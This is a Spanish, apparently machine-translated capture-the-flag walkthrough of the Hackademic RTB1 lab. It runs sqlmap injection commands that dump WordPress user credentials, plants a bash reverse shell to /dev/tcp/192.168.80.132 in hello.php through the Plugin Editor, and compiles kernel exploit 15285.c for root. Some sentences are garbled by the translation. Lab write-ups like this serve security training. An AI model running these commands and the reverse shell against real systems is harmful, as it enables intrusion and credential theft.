Serie: Hackademic (un total de 2 unidades en esta serie)
Dificultad: Principiante
recoger mensaje
descubrimiento de host
netdiscover -r 192.168.80.0/24
escaneo de puertos
nmap -A -p- 192.168.80.143
Puerto de acceso 80
Utilice el complemento de huellas digitales para ver síWordPress
Según el contenido que se muestra en la página de inicio, haga clic entarget
Haga clic en el enlace en el que se puede hacer clic en la página y descubra que Uncategorized
cuando hace clic, el enlace se convierte en
http://192.168.80.143/Hackademic_RTB1/?cat=1
Pruebe si hay inyección SQL, ?cat=1
agréguela después '
y descubra que hay un mensaje de error en la declaración SQL, puede juzgar que existe una vulnerabilidad de inyección SQL
escaneo de directorio
Simple explosión de la dirección IP, no se puede escanear información útil del directorio
dirsearch -u http://192.168.80.143 -i 200
Al principio, escaneó la IP directamente, y ahora hay un directorio adicional /Hackademic_RTB1/, luego escaneó directamente el directorio
dirsearch -u http://192.168.80.143/Hackademic_RTB1/ -i 200
explotar
mapa sql
Ver qué bases de datos están disponibles
sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" --dbs --batch
obtener todas las tablas
sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch
Obtener todos los campos de la tabla
sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns --batch
obtener los datos deseados
sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_login,user_pass --dump
Fondo de inicio de sesión192.168.80.143/Hackademic_RTB1/wp-admin/
Utilice una contraseña de usuario para iniciar sesión con NickJames
una contraseña:admin
No hay nada que usar después de iniciar sesión, intente iniciar sesión con otro usuario
Usuario: GeorgeMiller
contraseña q1w2e3
, encontré que hay una dirección editada Plugins
en la opción , agregue un shell inversoPlugin Editor
system("bash -c 'sh -i &>/dev/tcp/192.168.80.132/8989 0>&1'");
Kali comienza a monitorear
nc -lvvp 8989
Después de enviar, debe conocer la ruta anterior y descubrir la ruta adesencadenarcaparazón de rebote
Encuentre el método uno de la ruta de envío:
Los archivos cargados por WordPress se almacenan en el directorio de forma predeterminada
/wp-content/uploads
, y la carpeta Cargas incluye todas las imágenes, videos y archivos adjuntos cargados.Dentro de la carpeta de WordPress, encontrará una gran cantidad de archivos de código y 3 carpetas**wp-admin contenido-wp wp-incluye**
wp-admin
Así es, este es su panel de control, la interfaz que ve después de iniciar sesión en WordPress, incluidos todos los archivos de fondo.
wp-content
Contiene todo su contenido, incluidos complementos, temas y sus cargas.La carpeta Complementos contiene todos los complementos. Cada complemento tiene su propia carpeta. Si Aksimet se encuentra dentro de la carpeta Akismet
Asimismo, la carpeta de temas contiene todos sus temas. Al igual que los complementos, hay carpetas separadas para cada tema.
Carpeta de cargas, todas las imágenes, videos y archivos adjuntos cargados.
Los idiomas se tratan de idiomas.
wp-includes
Incluye todos los archivos y bibliotecas necesarios para el administrador de WordPress, el editor y las bibliotecas de JavaScript, CSS y campos de imágenes.
Cuando exploté el directorio, encontré un wp-content
directorio, puedes visitarlo para verlo.
La página se muestra de la siguiente manera.
http://192.168.80.143/Hackademic_RTB1/wp-content/
Justo ahora en el shell de rebote editado Plugins
en las opciones , justo ahora la página de edición también muestra que está editandoPlugin Editor
Plugin Editor
hello.php
Entonces en http://192.168.80.143/Hackademic_RTB1/wp-content/
la página haga clicplugins
Lo vi hello.php
, haz clic para hello.php
activar el proyectil de rebote (espera pacientemente -----------------)
escalada de privilegios del kernel
Verifique la versión del kernel
uname -a
Abra una nueva terminal para buscar vulnerabilidades de esta versión.
searchsploit 2.6.3 | grep "Local Privilege Escalation"
ver ruta completa
searchsploit -p linux/local/15285.c
Copie esto 15285.c
a la apache
ruta raíz del servicio./var/www/html
sudo cp /usr/share/exploitdb/exploits/linux/local/15285.c /var/www/html/15285.c
iniciar apache
servicio
systemctl restart apache2.service
gcc 15285.c -o exp
# 将15285.c预处理、汇编、编译并链接形成可执行文件exp
#-o选项用来指定输出文件的文件名
Preprocesar 15285.c
, ensamblar, compilar y vincular para formar un archivo ejecutable exp
.
-o
opción para especificar el nombre del archivo de salida
¡Pasó el nivel con éxito! ! !